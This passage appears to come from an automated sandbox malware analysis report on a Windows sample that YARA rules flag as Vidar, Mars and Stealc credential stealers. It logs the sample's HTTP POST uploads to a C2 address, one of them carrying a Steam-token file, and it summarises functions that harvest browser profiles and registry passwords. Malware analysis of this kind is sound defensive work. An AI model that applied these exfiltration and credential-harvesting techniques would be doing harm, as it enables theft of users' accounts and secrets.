34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file"------CAFHDBGHJKFIDHJJJEBK--
Jul 2, 2024 07:31:17.328524113 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:17.409965038 CEST	200	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC Host: 40.86.87.10 Content-Length: 97855 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 07:31:18.254029989 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:18.344935894 CEST	468	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCA Host: 40.86.87.10 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"jbdtaijovg------AEBGHDBKEBGIDHJJEHCA--
Jul 2, 2024 07:31:18.802597046 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	0
Start time:	01:30:58
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\i3NmF0obCm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\i3NmF0obCm.exe"
Imagebase:	0xee0000
File size:	161'792 bytes
MD5 hash:	253CCAC8A47B80287F651987C0C779EA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00EF76E0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01322B78), ref: 00EF7721
GetProcAddress.KERNEL32(74DD0000,01322D58), ref: 00EF773A
GetProcAddress.KERNEL32(74DD0000,01322B90), ref: 00EF7752
GetProcAddress.KERNEL32(74DD0000,01322BD8), ref: 00EF776A
GetProcAddress.KERNEL32(74DD0000,01322C68), ref: 00EF7783
GetProcAddress.KERNEL32(74DD0000,01321498), ref: 00EF779B
GetProcAddress.KERNEL32(74DD0000,0131ADD0), ref: 00EF77B3
GetProcAddress.KERNEL32(74DD0000,0131AE30), ref: 00EF77CC
GetProcAddress.KERNEL32(74DD0000,01322D88), ref: 00EF77E4
GetProcAddress.KERNEL32(74DD0000,01322BA8), ref: 00EF77FC
GetProcAddress.KERNEL32(74DD0000,01322C80), ref: 00EF7815
GetProcAddress.KERNEL32(74DD0000,01322AB8), ref: 00EF782D
GetProcAddress.KERNEL32(74DD0000,0131AE70), ref: 00EF7845
GetProcAddress.KERNEL32(74DD0000,01322C08), ref: 00EF785E
GetProcAddress.KERNEL32(74DD0000,01322C20), ref: 00EF7876
GetProcAddress.KERNEL32(74DD0000,0131ACD0), ref: 00EF788E
GetProcAddress.KERNEL32(74DD0000,01322CB0), ref: 00EF78A7
GetProcAddress.KERNEL32(74DD0000,01322AE8), ref: 00EF78BF
GetProcAddress.KERNEL32(74DD0000,0131AC30), ref: 00EF78D7
GetProcAddress.KERNEL32(74DD0000,01322E00), ref: 00EF78F0
GetProcAddress.KERNEL32(74DD0000,0131AC50), ref: 00EF7908
LoadLibraryA.KERNEL32(01322E18,?,00EF4930), ref: 00EF791A
LoadLibraryA.KERNEL32(01322E30,?,00EF4930), ref: 00EF792B
LoadLibraryA.KERNEL32(01322E48,?,00EF4930), ref: 00EF793D
LoadLibraryA.KERNEL32(01322E78,?,00EF4930), ref: 00EF794F
LoadLibraryA.KERNEL32(01322E60,?,00EF4930), ref: 00EF7960
GetProcAddress.KERNEL32(75A70000,01322DB8), ref: 00EF7982
GetProcAddress.KERNEL32(75290000,01322DD0), ref: 00EF79A3
GetProcAddress.KERNEL32(75290000,01322DE8), ref: 00EF79BB
GetProcAddress.KERNEL32(75BD0000,01323DB0), ref: 00EF79DD
GetProcAddress.KERNEL32(75450000,0131AC70), ref: 00EF79FE
GetProcAddress.KERNEL32(76E90000,013214A8), ref: 00EF7A1F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00EF7A36

Strings

NtQueryInformationProcess, xrefs: 00EF7A2A

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: bb8d262212f1d9ec5e99423b442a7c9feda2e712f358418fdfcfd0d8069fb9ca
Instruction ID: dfc19468793678a1113b33a10fdb8f33f699b2a23c4730885c1b5cb48e9d17ba
Opcode Fuzzy Hash: bb8d262212f1d9ec5e99423b442a7c9feda2e712f358418fdfcfd0d8069fb9ca
Instruction Fuzzy Hash: F9A13FB5D50600AFC7AEDFA8F5889163BBAB74C3517108539A6698324CD7F998D0CF22

Function 00EEB630 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

FindFirstFileA.KERNEL32(00000000,?,00EFE50F,00EFE50B,00000000,?,?,?,00EFEC44,00EFE50A), ref: 00EEB6B5
StrCmpCA.SHLWAPI(?,00EFEC48), ref: 00EEB70D
StrCmpCA.SHLWAPI(?,00EFEC4C), ref: 00EEB723
FindNextFileA.KERNELBASE(000000FF,?), ref: 00EEBF5E
FindClose.KERNEL32(000000FF), ref: 00EEBF70

Strings

Preferences, xrefs: 00EEB8DE
\Brave\Preferences, xrefs: 00EEB99B
Brave, xrefs: 00EEB8C2
Google Chrome, xrefs: 00EEBDDC

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 76f347b0911479017ba83225159cd7a7b2405755a5d0efd25c22a1ca9666ca97
Instruction ID: 074489d0375700963b0a48dbcac1d00bbe7bd1f58de62bf4a4e607ef3200bca9
Opcode Fuzzy Hash: 76f347b0911479017ba83225159cd7a7b2405755a5d0efd25c22a1ca9666ca97
Instruction Fuzzy Hash: 3F42FF7291014C9BCF18FB60DD96EFE73B9AF94300F4051A9B60AB6195EF34AB48CB51

Function 6C4D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C55F688,00001000), ref: 6C4D35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4D35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C4D35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C4D363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C4D369F
__aulldiv.LIBCMT ref: 6C4D36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C4D3773
EnterCriticalSection.KERNEL32(6C55F688), ref: 6C4D377E
LeaveCriticalSection.KERNEL32(6C55F688), ref: 6C4D37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C4D37C4
EnterCriticalSection.KERNEL32(6C55F688), ref: 6C4D37CB
LeaveCriticalSection.KERNEL32(6C55F688), ref: 6C4D3801
__aulldiv.LIBCMT ref: 6C4D3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C4D3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C4D3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C4D394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6C4D35DB
QPC, xrefs: 6C4D38FC
AuthcAMDenti, xrefs: 6C4D3946
GenuntelineI, xrefs: 6C4D3639
GTC, xrefs: 6C4D3912

Memory Dump Source

Source File: 00000000.00000002.1883807257.000000006C4D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.1883788263.000000006C4D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883923947.000000006C55E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 154eb6a18c9d98a79f58d991c35f3955437efe96b466d544edf1895e877b6a1e
Instruction ID: d69a3b7f6e575d2c01b89d5b92c17a87622fa83b3f866037841364b4a7d22862
Opcode Fuzzy Hash: 154eb6a18c9d98a79f58d991c35f3955437efe96b466d544edf1895e877b6a1e
Instruction Fuzzy Hash: 11B1C671B053109FDB08EF28CC54B1A7BF5BB89704F468A2EE899D7790D774A804CB95

Function 00EF3560 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00EF3579
FindFirstFileA.KERNEL32(?,?), ref: 00EF3590
StrCmpCA.SHLWAPI(?,00EFE8C4), ref: 00EF35BE
StrCmpCA.SHLWAPI(?,00EFE8C8), ref: 00EF35D4
FindNextFileA.KERNEL32(000000FF,?), ref: 00EF37A9
FindClose.KERNEL32(000000FF), ref: 00EF37BE

Strings

%s\*, xrefs: 00EF356D
%s\%s, xrefs: 00EF35EE
%s\%s, xrefs: 00EF363F

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 502085c7ccc7d4d5aee82eaf417fa5960b153031b3866a1da68891a74c41b45a
Instruction ID: 3d4cea38fab44b6d1fcff8dcc89c2c3a2a58bd73b8b540a559610403c79ae443
Opcode Fuzzy Hash: 502085c7ccc7d4d5aee82eaf417fa5960b153031b3866a1da68891a74c41b45a
Instruction Fuzzy Hash: 626149B190021CABCB25EBA0DD49DEA77BDBB48741F044598F61AA6144EB70EB84CF91

Function 00EF2B70 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00EF2B8D
FindFirstFileA.KERNEL32(?,?), ref: 00EF2BA4
StrCmpCA.SHLWAPI(?,00EFE894), ref: 00EF2BD2
StrCmpCA.SHLWAPI(?,00EFE898), ref: 00EF2BE8
FindNextFileA.KERNEL32(000000FF,?), ref: 00EF2D2D
FindClose.KERNEL32(000000FF), ref: 00EF2D42

Strings

%s\%s, xrefs: 00EF2B81
B., xrefs: 00EF2D59, 00EF2CDA, 00EF2BB9, 00EF2CDD

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$B.
API String ID: 180737720-4086482651
Opcode ID: 8f0c08a6021c9324589906bca6bab450686c6f73b225bf34611d188d9024223b
Instruction ID: 749c079c6858367a54cc2089c4769b52dcdae6374ab72cfd3a584104d07fb31b
Opcode Fuzzy Hash: 8f0c08a6021c9324589906bca6bab450686c6f73b225bf34611d188d9024223b
Instruction Fuzzy Hash: 3A5134B190021CABCB29EBB0DD85EEE737DBB44740F04859CB719A6044EBB5AB84CF50

Function 00EEEDE0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EFEE08,00EFE76A), ref: 00EEEE4B
StrCmpCA.SHLWAPI(?,00EFEE0C), ref: 00EEEE93
StrCmpCA.SHLWAPI(?,00EFEE10), ref: 00EEEEA9
FindNextFileA.KERNELBASE(000000FF,?), ref: 00EEF1C0
FindClose.KERNEL32(000000FF), ref: 00EEF1D2

Strings

prefs.js, xrefs: 00EEEF33

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 9a9e44c7fbcbe2cb2cd90cb04ccc181ef6d1b810064d2fed3bdc5b00115f3c41
Instruction ID: f96ae00016d49ddd89b65f0df61680372d4be0a220447cf106d1c7929face7cf
Opcode Fuzzy Hash: 9a9e44c7fbcbe2cb2cd90cb04ccc181ef6d1b810064d2fed3bdc5b00115f3c41
Instruction Fuzzy Hash: D3B1017190011C9BCF28FF60DD96AFE73B9AF54300F5095A9E50AA6195EF30AB48CF91

Function 00EE4C90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EE4CAA
RtlAllocateHeap.NTDLL(00000000), ref: 00EE4CB1
InternetOpenA.WININET(00EFE7B6,00000000,00000000,00000000,00000000), ref: 00EE4CCA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EE4CF1
InternetReadFile.WININET(u@,?,00000400,00000000), ref: 00EE4D21
InternetCloseHandle.WININET(u@), ref: 00EE4D95
InternetCloseHandle.WININET(?), ref: 00EE4DA2

Strings

u@, xrefs: 00EE4CE1, 00EE4DC0
u@, xrefs: 00EE4D91, 00EE4D1D, 00EE4D20, 00EE4D94

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: u@$u@
API String ID: 3066467675-2476439253
Opcode ID: c5ee355e587f853963e4d712389fdd342c4a354b7cc5bbbe24ecf1caca7ff811
Instruction ID: 0268039353d1b68b443264f0fc1dde17af2b08625d5521844a853e2e944651ec
Opcode Fuzzy Hash: c5ee355e587f853963e4d712389fdd342c4a354b7cc5bbbe24ecf1caca7ff811
Instruction Fuzzy Hash: 2A31E4B4E4021CABDB24DF54DC85BEDB7B5AB48304F5081E8B709B7284DBB46AC58F58

Function 00EE1600 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F02740,?,00EE1E43,?,00F02744,?,?,00000000,?,00000000), ref: 00EE1853
StrCmpCA.SHLWAPI(?,00F02748), ref: 00EE18A3
StrCmpCA.SHLWAPI(?,00F0274C), ref: 00EE18B9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EE1C70
DeleteFileA.KERNEL32(00000000), ref: 00EE1CF4
FindNextFileA.KERNEL32(000000FF,?), ref: 00EE1D4A
FindClose.KERNEL32(000000FF), ref: 00EE1D5C

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Strings

\*.*, xrefs: 00EE1721

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 67393d78b99b6e015dcdc9ad1a7c16941fb135cf7e91c47746f64959a0e02c70
Instruction ID: 86b217f846d22e9050e3752d7a78ca94ea6b2ae81374ab12522ffb45da19ff0f
Opcode Fuzzy Hash: 67393d78b99b6e015dcdc9ad1a7c16941fb135cf7e91c47746f64959a0e02c70
Instruction Fuzzy Hash: A812BD7191011C9BCF59FB60CD96AFEB3B9AF54300F5061E9A206B2491EF746B88CF61

Function 00EE6CD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EE6D14
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00EE7690), ref: 00EE6D3A
RegEnumValueA.ADVAPI32(00EE7690,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EE6DB1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EE6E0D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690,?), ref: 00EE6E52
HeapFree.KERNEL32(00000000,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690,?), ref: 00EE6E59

Part of subcall function 00EE8C40: vsprintf_s.MSVCRT ref: 00EE8C5B

task.LIBCPMTD ref: 00EE6F55

Strings

